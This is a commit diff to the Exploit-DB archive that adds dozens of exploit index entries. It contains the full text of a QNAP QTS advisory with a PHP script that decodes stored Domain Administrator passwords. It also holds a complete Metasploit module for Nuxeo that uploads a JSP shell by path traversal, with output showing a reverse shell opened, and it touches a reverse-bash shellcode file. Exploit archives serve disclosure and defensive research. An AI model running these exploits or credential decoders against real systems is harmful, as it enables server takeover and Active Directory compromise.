DB: 2017-03-28
25 new exploits Samba < 3.6.2 (x86) - Denial of Serviec (PoC) Samba < 3.6.2 (x86) - Denial of Service (PoC) Microsoft Visual Studio 2015 update 3 - Denial of Service Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow Apple Safari - 'DateTimeFormat.format' Type Confusion Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode Apple Safari - Out-of-Bounds Read when Calling Bound Function QNAP QTS < 4.2.4 - Domain Privilege Escalation Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory Github Enterprise - Default Session Secret And Deserialization (Metasploit) B2B Alibaba Clone Script - SQL Injection B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection Just Another Video Script 1.4.3 - SQL Injection Adult Tube Video Script - SQL Injection Alibaba Clone Script - SQL Injection B2B Marketplace Script 2.0 - SQL Injection Php Real Estate Property Script - SQL Injection Courier Tracking Software 6.0 - SQL Injection Parcel Delivery Booking Script 1.0 - SQL Injection Delux Same Day Delivery Script 1.0 - SQL Injection Hotel Booking Script 1.0 - SQL Injection Tour Package Booking 1.0 - SQL Injection Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection CouponPHP CMS 3.1 - 'code' Parameter SQL Injection EyesOfNetwork (EON) 5.0 - Remote Code Execution EyesOfNetwork (EON) 5.0 - SQL Injection Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit) inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation
This commit is contained in:
parent
d2c8c83204
commit
1f8c35c0c0
27 changed files with 1918 additions and 3 deletions
29
files.csv
29
files.csv
|
@ -4513,7 +4513,7 @@ id,file,description,date,author,platform,type,port
|
|||
36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0
|
||||
36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
|
||||
36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos,0
|
||||
36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,lin_x86,dos,0
|
||||
36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Service (PoC)",2015-04-13,sleepya,lin_x86,dos,0
|
||||
36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0
|
||||
36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
|
||||
36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
|
||||
|
@ -5425,6 +5425,11 @@ id,file,description,date,author,platform,type,port
|
|||
41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
|
||||
41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
|
||||
41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
|
||||
41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0
|
||||
41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0
|
||||
41741,platforms/multiple/dos/41741.html,"Apple Safari - 'DateTimeFormat.format' Type Confusion",2017-03-27,"Google Security Research",multiple,dos,0
|
||||
41742,platforms/multiple/dos/41742.html,"Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode",2017-03-27,"Google Security Research",multiple,dos,0
|
||||
41743,platforms/multiple/dos/41743.html,"Apple Safari - Out-of-Bounds Read when Calling Bound Function",2017-03-27,"Google Security Research",multiple,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -8887,6 +8892,7 @@ id,file,description,date,author,platform,type,port
|
|||
41713,platforms/windows/local/41713.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)",2010-10-20,Metasploit,windows,local,0
|
||||
41721,platforms/windows/local/41721.c,"Forticlient 5.2.3 Windows 10 x64 (Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
|
||||
41722,platforms/windows/local/41722.c,"Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
|
||||
41745,platforms/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -15390,6 +15396,9 @@ id,file,description,date,author,platform,type,port
|
|||
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
|
||||
41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
|
||||
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,Metasploit,python,remote,0
|
||||
41738,platforms/windows/remote/41738.py,"Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
|
||||
41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
|
||||
41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -37261,7 +37270,7 @@ id,file,description,date,author,platform,type,port
|
|||
41137,platforms/php/webapps/41137.txt,"Music Site Script 1.2 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
|
||||
41138,platforms/php/webapps/41138.txt,"Affiliate Tracking Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
|
||||
41139,platforms/php/webapps/41139.txt,"Mini CMS 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0
|
||||
41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0
|
||||
41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0
|
||||
41141,platforms/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,linux,webapps,0
|
||||
41143,platforms/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",php,webapps,0
|
||||
41147,platforms/hardware/webapps/41147.txt,"WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution",2017-01-24,"Kacper Szurek",hardware,webapps,0
|
||||
|
@ -37630,3 +37639,19 @@ id,file,description,date,author,platform,type,port
|
|||
41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
|
||||
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
|
||||
41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
|
||||
41724,platforms/php/webapps/41724.txt,"Just Another Video Script 1.4.3 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41725,platforms/php/webapps/41725.txt,"Adult Tube Video Script - SQL Injection",2017-03-25,"Ihsan Sencan",php,webapps,0
|
||||
41726,platforms/php/webapps/41726.txt,"Alibaba Clone Script - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41727,platforms/php/webapps/41727.txt,"B2B Marketplace Script 2.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41728,platforms/php/webapps/41728.txt,"Php Real Estate Property Script - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41729,platforms/php/webapps/41729.txt,"Courier Tracking Software 6.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41730,platforms/php/webapps/41730.txt,"Parcel Delivery Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41731,platforms/php/webapps/41731.txt,"Delux Same Day Delivery Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41732,platforms/php/webapps/41732.txt,"Hotel Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41733,platforms/php/webapps/41733.txt,"Tour Package Booking 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0
|
||||
41735,platforms/php/webapps/41735.txt,"Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0
|
||||
41736,platforms/php/webapps/41736.txt,"CouponPHP CMS 3.1 - 'code' Parameter SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0
|
||||
41746,platforms/php/webapps/41746.txt,"EyesOfNetwork (EON) 5.0 - Remote Code Execution",2017-03-27,Sysdream,php,webapps,0
|
||||
41747,platforms/php/webapps/41747.txt,"EyesOfNetwork (EON) 5.0 - SQL Injection",2017-03-27,Sysdream,php,webapps,0
|
||||
41748,platforms/jsp/webapps/41748.rb,"Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit)",2017-03-27,Sysdream,jsp,webapps,0
|
||||
41749,platforms/php/webapps/41749.txt,"inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation",2017-03-27,"Tim Herres",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
215
platforms/hardware/local/41745.txt
Executable file
215
platforms/hardware/local/41745.txt
Executable file
|
@ -0,0 +1,215 @@
|
|||
QNAP QTS Domain Privilege Escalation Vulnerability
|
||||
|
||||
Name Sensitive Data Exposure in QNAP QTS
|
||||
Systems Affected QNAP QTS (NAS) all model and all versions < 4.2.4
|
||||
Severity High 7.9/10
|
||||
Impact CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
|
||||
Vendor http://www.qnap.com/
|
||||
Advisory http://www.ush.it/team/ush/hack-qnap/qnap.txt
|
||||
Authors Pasquale "sid" Fiorillo (sid AT ush DOT it)
|
||||
Guido "go" Oricchio (g.oricchio AT pcego DOT com)
|
||||
Date 20170322
|
||||
|
||||
I. BACKGROUND
|
||||
|
||||
QNAP Systems, founded in 2004, provides network attached storage (NAS)
|
||||
and network video recorder (NVR) solutions for home and business use to
|
||||
the global market.
|
||||
QNAP also delivers a cloud service, called myQNAPcloud, that allows
|
||||
users to access and manage the devices from anywhere.
|
||||
QTS is a QNAP devices proprietary firmware based on Linux.
|
||||
|
||||
ISGroup (http://www.isgroup.biz/) is an Italian Information Security
|
||||
boutique, we found this 0day issue while supporting Guido Oricchio
|
||||
of PCego, a System Integrator, to secure a QNAP product for one of his
|
||||
customer.
|
||||
|
||||
Responsible disclosure with Qnap: we contacted qnap on public security@
|
||||
contact and we escalate fast to their Security Researcher Myron Su on
|
||||
PGP emails.
|
||||
|
||||
Prior vulnerabilities in QNAP:
|
||||
https://www.qnap.com/en/support/con_show.php?op=showone&cid=41
|
||||
|
||||
Information to customers of the vulnerability is shown in their bulletin
|
||||
ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113):
|
||||
QTS 4.2.4 Build 20170313 includes security fixes for the following
|
||||
vulnerabilities: Configuration file vulnerability (CVE-2017-5227)
|
||||
reported by Pasquale Fiorillo of the cyber security company ISGroup
|
||||
(www.isgroup.biz), a cyber security company, and Guido Oricchio of
|
||||
PCego (www.pcego.com), a system integrator.
|
||||
|
||||
The latest version of the software at the time of writing can be
|
||||
obtained from:
|
||||
|
||||
https://www.qnap.com/en-us/product_x_down/
|
||||
https://start.qnap.com/en/index.php
|
||||
https://www.qnap.com/
|
||||
|
||||
II. DESCRIPTION
|
||||
|
||||
The vulnerability allows a local QTS admin user, or other low privileged
|
||||
user, to access configuration file that includes a bad crypted Microsoft
|
||||
Domain Administrator password if the NAS was joined to a Microsoft
|
||||
Active Directory domain.
|
||||
|
||||
The affected component is the "uLinux.conf" configuration file,
|
||||
created with a world-readable permission used to store a Domain
|
||||
Administrator password.
|
||||
|
||||
Admin user can access the file using ssh that is enabled by default.
|
||||
Other users are not allowed to login, so they have to exploit a
|
||||
component, such as a web application, to run arbitrary command or
|
||||
arbitrary file read.
|
||||
|
||||
TLDR: Anyone is able to read uLinux.conf file, world readable by
|
||||
default, can escalate to Domain Administrator if a NAS is a domain
|
||||
member.
|
||||
|
||||
III. ANALYSIS
|
||||
|
||||
QNAP QTS stores "uLinux.conf" configuration file in a directory
|
||||
accessible by "nobody" and with permission that make them readable by
|
||||
"nobody".
|
||||
|
||||
If the NAS was joined to an Active Directory, such file contain a Domain
|
||||
Administrator user and password in an easily decrypt format.
|
||||
|
||||
In older versions of QTS the Domain Admin's password was stored in
|
||||
plaintext.
|
||||
|
||||
A) Config file readable by "nobody"
|
||||
|
||||
[~] # ls -l /etc/config/uLinux.conf
|
||||
-rw-r--r-- 1 admin administ 7312 Dec 10 06:39 /etc/config/uLinux.conf
|
||||
|
||||
Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U,
|
||||
TS-469L, and TS-221. Access to the needed file are guaranteed to
|
||||
all the local users, such as httpdusr used to running web sites and
|
||||
web application hosted on the NAS.
|
||||
|
||||
This expose all the information contained in the configuration file at
|
||||
risk and this is a violation of the principle of least privilege.
|
||||
|
||||
https://en.wikipedia.org/wiki/Principle_of_least_privilege
|
||||
|
||||
B) Weak encrypted password in the configuration file
|
||||
|
||||
The Microsoft Active Directory Admin username and password are stored
|
||||
in the file obfuscated by a simple XOR cypher and base64 encoded.
|
||||
|
||||
In this scenario, a Local File Read vulnerability could lead to full
|
||||
domain compromise given the fact that an attacker can re-use such
|
||||
credentials to authenticate against a Domain Controller with maximum
|
||||
privileges.
|
||||
|
||||
The password field in the uLinux.conf has the following format:
|
||||
|
||||
User = <username>
|
||||
Password = <base64>
|
||||
|
||||
eg:
|
||||
User = Administrator
|
||||
Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
|
||||
|
||||
The "<base64>" decoded is:
|
||||
|
||||
sid@zen:~$echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C
|
||||
00000000 03 03 00 00 01 01 06 06 07 07 04 04 23 23 20 20 |............## |
|
||||
00000010 21 21 26 26 27 27 24 24 43 |!!&&''$$C|
|
||||
00000019
|
||||
|
||||
Each byte xored with \x62 is the hex ascii code of the plaintext char.
|
||||
Eg:
|
||||
\x03 ^ \x62 = \x61 (a)
|
||||
\x00 ^ \x62 = \x61 (b)
|
||||
...
|
||||
\x24 ^ \x62 = \x46 (F)
|
||||
\x43 ^ \x62 = \x21 (!)
|
||||
|
||||
The plaintext password is: aabbccddeeffAABBCCDDEEFF!
|
||||
|
||||
IV. EXPLOIT
|
||||
|
||||
The following code can be used to decode the password:
|
||||
|
||||
#!/usr/bin/php
|
||||
<?php
|
||||
$plaintext = str_split(base64_decode($argv[1]));
|
||||
foreach($plaintext as $chr) {
|
||||
echo chr(ord($chr)^0x62);
|
||||
}
|
||||
echo "\n";
|
||||
|
||||
Eg: sid@zen:~$ ./decode.php AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
|
||||
aabbccddeeffAABBCCDDEEFF!
|
||||
|
||||
V. VENDOR RESPONSE
|
||||
Vendor released QTS 4.2.4 Build 20170313 that contains the proper
|
||||
security patch. At the time of this writing an official patch is
|
||||
currently available.
|
||||
|
||||
VI. CVE INFORMATION
|
||||
|
||||
Mitre assigned the CVE-2017-5227 for this vulnerability, internally to
|
||||
Qnap it's referred as Case NAS-201703-21.
|
||||
|
||||
VII. DISCLOSURE TIMELINE
|
||||
|
||||
20161212 Bug discovered
|
||||
20170106 Request for CVE to Mitre
|
||||
20170106 Disclosure to security@qnap.com
|
||||
20170107 Escalation to Myron Su, Security Researcher from QNAP (fast!)
|
||||
20170107 Details disclosure to Myron Su
|
||||
20170109 Got CVE-CVE-2017-5227 from cve-assign
|
||||
20170110 Myron Su confirm the vulnerability
|
||||
20170203 We asks for updates, no release date from vendor
|
||||
20170215 We extend the disclosure date as 28 Feb will not be met
|
||||
20170321 QNAP releases the QTS 4.2.4 Build 20170313
|
||||
20170322 Advisory disclosed to the public
|
||||
|
||||
VIII. REFERENCES
|
||||
|
||||
[1] Top 10 2013-A6-Sensitive Data Exposure
|
||||
https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure
|
||||
|
||||
[2] Access Control Cheat Sheet
|
||||
https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
|
||||
|
||||
[3] https://forum.qnap.com/viewtopic.php?t=68317
|
||||
20121213 User reporting that the password was stored in plaintext in
|
||||
a world-readable file
|
||||
|
||||
[4] https://www.qnap.com/en/support/con_show.php?cid=113
|
||||
Qnap Security Bullettin NAS-201703-21
|
||||
|
||||
IX. CREDIT
|
||||
|
||||
Pasquale "sid" Fiorillo and Guido "go" Oricchio are credited with the
|
||||
discovery of this vulnerability.
|
||||
|
||||
Pasquale "sid" Fiorillo
|
||||
web site: http://www.pasqualefiorillo.it/
|
||||
mail: sid AT ush DOT it
|
||||
|
||||
Guido "go" Oricchio
|
||||
web site: http://www.pcego.com/
|
||||
mail: g.oricchio AT pcego DOT com
|
||||
|
||||
X. LEGAL NOTICES
|
||||
|
||||
Copyright (c) 2017 Pasquale "sid" Fiorillo
|
||||
|
||||
Permission is granted for the redistribution of this alert
|
||||
electronically. It may not be edited in any way without mine express
|
||||
written consent. If you wish to reprint the whole or any
|
||||
part of this alert in any other medium other than electronically,
|
||||
please email me for permission.
|
||||
|
||||
Disclaimer: The information in the advisory is believed to be accurate
|
||||
at the time of publishing based on currently available information. Use
|
||||
of the information constitutes acceptance for use in an AS IS condition.
|
||||
There are no warranties with regard to this information. Neither the
|
||||
author nor the publisher accepts any liability for any direct, indirect,
|
||||
or consequential loss or damage arising from use of, or reliance on,
|
||||
this information.
|
216
platforms/jsp/webapps/41748.rb
Executable file
216
platforms/jsp/webapps/41748.rb
Executable file
|
@ -0,0 +1,216 @@
|
|||
=begin
|
||||
# Description
|
||||
|
||||
Nuxeo Platform is a content management system for enterprises (CMS).
|
||||
It embeds an Apache Tomcat server, and can be managed through a web
|
||||
interface.
|
||||
|
||||
One of its features allows authenticated users to import files to the
|
||||
platform.
|
||||
By crafting the upload request with a specific ``X-File-Name`` header,
|
||||
one can successfuly upload a file at an arbitrary location of the server
|
||||
file system.
|
||||
|
||||
It is then possible to upload a JSP script to the root directory of the
|
||||
web application to execute commands on the remote host operating system.
|
||||
Setting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the
|
||||
``X-File-Name`` header is a way to do so.
|
||||
|
||||
## Details
|
||||
|
||||
**CVE ID**: CVE-2017-5869
|
||||
|
||||
**Access Vector**: network
|
||||
|
||||
**Security Risk**: high
|
||||
|
||||
**Vulnerability**: CWE-434
|
||||
|
||||
**CVSS Base Score**: 8.8
|
||||
|
||||
**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
|
||||
# Proof of Concept
|
||||
|
||||
Here is a metasploit module to exploit this vulnerability:
|
||||
|
||||
=end
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Nuxeo Platform File Upload RCE",
|
||||
'Description' => %q{
|
||||
The Nuxeo Platform tool is vulnerable to an authenticated remote code execution,
|
||||
thanks to an upload module.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => ['Ronan Kervella <r.kervella@sysdream.com>'],
|
||||
'References' =>
|
||||
[
|
||||
['https://nuxeo.com/', '']
|
||||
],
|
||||
'Platform' => %w{linux},
|
||||
'Targets' => [ ['Nuxeo Platform 6.0 to 7.3', 'Platform' => 'linux'] ],
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Privileged' => true,
|
||||
'Payload' => {},
|
||||
'DisclosureDate' => "",
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The path to the nuxeo application', '/nuxeo']),
|
||||
OptString.new('USERNAME', [true, 'A valid username', '']),
|
||||
OptString.new('PASSWORD', [true, 'Password linked to the username', ''])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def jsp_filename
|
||||
@jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp'
|
||||
end
|
||||
|
||||
def jsp_path
|
||||
'nxserver/nuxeo.war/' + jsp_filename
|
||||
end
|
||||
|
||||
def nuxeo_login
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, '/login.jsp')
|
||||
)
|
||||
|
||||
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
|
||||
session_cookie = res.get_cookies
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, '/nxstartup.faces'),
|
||||
'cookie' => session_cookie,
|
||||
'vars_post' => {
|
||||
'user_name' => datastore['USERNAME'],
|
||||
'user_password' => datastore['PASSWORD'],
|
||||
'submit' => 'Connexion'
|
||||
}
|
||||
)
|
||||
return session_cookie if res && res.code == 302 && res.redirection.to_s.include?('view_home.faces')
|
||||
nil
|
||||
end
|
||||
|
||||
def trigger_shell
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, jsp_filename)
|
||||
)
|
||||
fail_with(Failure::Unknown, 'Unable to get #{full_uri}/#{jsp_filename}') unless res && res.code == 200
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Authenticating using #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
|
||||
session_cookie = nuxeo_login
|
||||
if session_cookie
|
||||
payload_url = normalize_uri(target_uri.path, jsp_filename)
|
||||
res = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, '/site/automation/batch/upload'),
|
||||
'cookie' => session_cookie,
|
||||
'headers' => {
|
||||
'X-File-Name' => '../../' + jsp_path,
|
||||
'X-Batch-Id' => '00',
|
||||
'X-File-Size' => '1024',
|
||||
'X-File-Type' => '',
|
||||
'X-File-Idx' => '0',
|
||||
'X-Requested-With' => 'XMLHttpRequest'
|
||||
},
|
||||
'ctype' => '',
|
||||
'data' => payload.encoded
|
||||
)
|
||||
fail_with(Failure::Unknown, 'Unable to upload the payload') unless res && res.code == 200
|
||||
print_status("Executing the payload at #{normalize_uri(target_uri.path, payload_url)}.")
|
||||
trigger_shell
|
||||
else
|
||||
fail_with(Failure::Unknown, 'Unable to login')
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
=begin
|
||||
Module output:
|
||||
|
||||
```bash
|
||||
msf> use exploit/multi/http/nuxeo
|
||||
msf exploit(nuxeo) > set USERNAME user1
|
||||
USERNAME => user1
|
||||
msf exploit(nuxeo) > set PASSWORD password
|
||||
PASSWORD => password
|
||||
msf exploit(nuxeo) > set rhost 192.168.253.132
|
||||
rhost => 192.168.253.132
|
||||
msf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp
|
||||
payload => java/jsp_shell_reverse_tcp
|
||||
msf exploit(nuxeo) > set lhost 192.168.253.1
|
||||
lhost => 192.168.253.1
|
||||
msf exploit(nuxeo) > exploit
|
||||
|
||||
[-] Handler failed to bind to 192.168.253.1:4444:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:4444
|
||||
[*] Authenticating using user1:password
|
||||
[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp.
|
||||
[*] Command shell session 1 opened (172.17.0.2:4444 ->
|
||||
192.168.253.132:43279) at 2017-01-13 14:47:25 +0000
|
||||
|
||||
id
|
||||
uid=1000(nuxeo) gid=1000(nuxeo)
|
||||
groups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
|
||||
pwd
|
||||
/var/lib/nuxeo/server
|
||||
```
|
||||
|
||||
# Vulnerable code
|
||||
|
||||
The vulnerable code is located in the
|
||||
`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github
|
||||
link](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)),
|
||||
where the header ``X-File-Name`` is not checked.
|
||||
|
||||
# Fix
|
||||
|
||||
Nuxeo provided a
|
||||
[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892)
|
||||
for this issue.
|
||||
A hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35).
|
||||
|
||||
Please note that vulnerability does not affect Nuxeo versions above 7.3.
|
||||
|
||||
# Affected versions
|
||||
|
||||
* Nuxeo 6.0 (LTS 2014), released 2014-11-06
|
||||
* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15
|
||||
* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24
|
||||
* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24
|
||||
|
||||
# Unaffected versions
|
||||
|
||||
* Nuxeo 6.0 HF35, released 2017-01-12
|
||||
* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02
|
||||
* Nuxeo 7.10 (LTS 2015), released 2015-11-09
|
||||
* Nuxeo 8.10 (LTS 2016), released 2016-12-06
|
||||
|
||||
# Credits
|
||||
|
||||
Ronan Kervella <r.kervella@sysdream.com>
|
||||
|
||||
-- SYSDREAM Labs <labs@sysdream.com>
|
||||
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
|
||||
* Website: https://sysdream.com/
|
||||
* Twitter: @sysdream
|
||||
=end
|
|
@ -2,7 +2,6 @@
|
|||
; File name: reversebash.nasm
|
||||
; Author: Jasmin Landry (@JR0ch17)
|
||||
; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119
|
||||
; To change
|
||||
; Shellcode length: 110 bytes
|
||||
; Tested on Ubuntu 12.04.5 32-bit (x86)
|
||||
; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g
|
||||
|
|
195
platforms/linux/remote/41744.rb
Executable file
195
platforms/linux/remote/41744.rb
Executable file
|
@ -0,0 +1,195 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
